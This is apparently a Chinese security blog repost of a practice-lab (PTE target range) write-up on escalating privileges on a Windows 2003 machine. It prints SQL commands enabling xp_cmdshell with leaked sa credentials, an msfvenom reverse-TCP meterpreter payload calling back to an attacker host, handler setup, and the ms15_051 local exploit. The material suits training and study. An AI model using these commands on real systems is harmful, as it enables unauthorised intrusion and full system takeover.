继续深入 | 一次PTE靶机练习环境记录

admin 2024年10月20日00:44:00评论18 views字数 1437阅读4分47秒阅读模式
继续深入 | 一次PTE靶机练习环境记录
01
文章背景
    前两天写完后,我突然发现那台Windows 2003桌面还有个key文件,虽然跟数据库里那个key3一模一样。但我总觉得不会像昨天那么简单,因为按照正常思路来说应该有一个提权操作之类的,而且桌面正好有一个key,那我们就模拟过程来深入一下。
02
持续深入
    昨天我是用C刀连接的,那玩意不好使,今天哥斯拉这个马子。如果是aspx的马,哥斯拉有效载荷要选择 CShapDynamicPayload
继续深入 | 一次PTE靶机练习环境记录
    执行一下命令,看看权限:
继续深入 | 一次PTE靶机练习环境记录
    果然……权限低了,key就在桌面上,但是搜索不到,要提权。
继续深入 | 一次PTE靶机练习环境记录
继续深入 | 一次PTE靶机练习环境记录
提权手法
    提权方式推荐有两种:
        1、SA权限连接数据库,通过SqlServer开启xp_cmdshell,以此来进行命令执行
        2、上线MSF,利用MSF进行提权。
方式1:SA权限命令执行
    down用户权限低了,执行不了命令:
继续深入 | 一次PTE靶机练习环境记录
    在网站根目录下还有个备份文件,里面有sa用户信息:
继续深入 | 一次PTE靶机练习环境记录
    重新连接,给我上:
继续深入 | 一次PTE靶机练习环境记录
    此时我们权限已经是sa了,执行命令开启xp_cmdshell扩展:
exec sp_configure "show advanced options",1  //允许修改高级参数reconfigure  //重载配置exec sp_configure 'xp_cmdshell',1  //开启xp_cmdshellreconfigure
继续深入 | 一次PTE靶机练习环境记录
    开启后,尝试执行命令:
exec master..xp_cmdshell 'whoami'
继续深入 | 一次PTE靶机练习环境记录
    system到手,再来搜一下文本,有了:
exec master..xp_cmdshell 'dir c: /s /b | find ".txt"'
继续深入 | 一次PTE靶机练习环境记录
    读取一下文本内容:
exec master..xp_cmdshell 'type "文件路径key.txt"'
继续深入 | 一次PTE靶机练习环境记录
方式2:MSF提权
    生成木马:
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.110.204 LPORT=4444 -f exe -o a.exe
继续深入 | 一次PTE靶机练习环境记录
    设置模块,开启监听:
use exploit/multi/handler    //选择监听模块set payload windows/meterpreter/reverse_tcp    //设置监听负载run
    上传木马并行,成功接收到Shell:
继续深入 | 一次PTE靶机练习环境记录
    将接收到的msf会话保存至后台:
bg    //将会话保存至后台sessions    //查看会话列表
继续深入 | 一次PTE靶机练习环境记录
    检测目标可利用的提权模块:
use multi/recon/local_exploit_suggester    //选择漏洞探测模块set session 2    //设置攻击目标为会话2run
继续深入 | 一次PTE靶机练习环境记录
    从绿shai的模块里随机挑选一个试试:
use exploit/windows/local/ms15_051_client_copy_image    //选择模块set payload windows/meterpreter/reverse_tcp    //设置攻击负载run
继续深入 | 一次PTE靶机练习环境记录
SYSTEM到手,下机~
后续还有些操作,不想写了~
思路基本就这样
感兴趣的可以自己去继续深入
继续深入 | 一次PTE靶机练习环境记录
(
END
)
!扫码添加哦!

继续深入 | 一次PTE靶机练习环境记录

免责声明
文章内容仅限授权测试或学习使用
请勿进行非法的测试或攻击

    利用本账号所发文章
进行直接或间接的非法行为
均由操作者本人负全责
犀利猪安全文章对应作者

不为此承担任何责任

原文始发于微信公众号(犀利猪安全):继续深入 | 一次PTE靶机练习环境记录

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月20日00:44:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   继续深入 | 一次PTE靶机练习环境记录https://cn-sec.com/archives/1905627.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息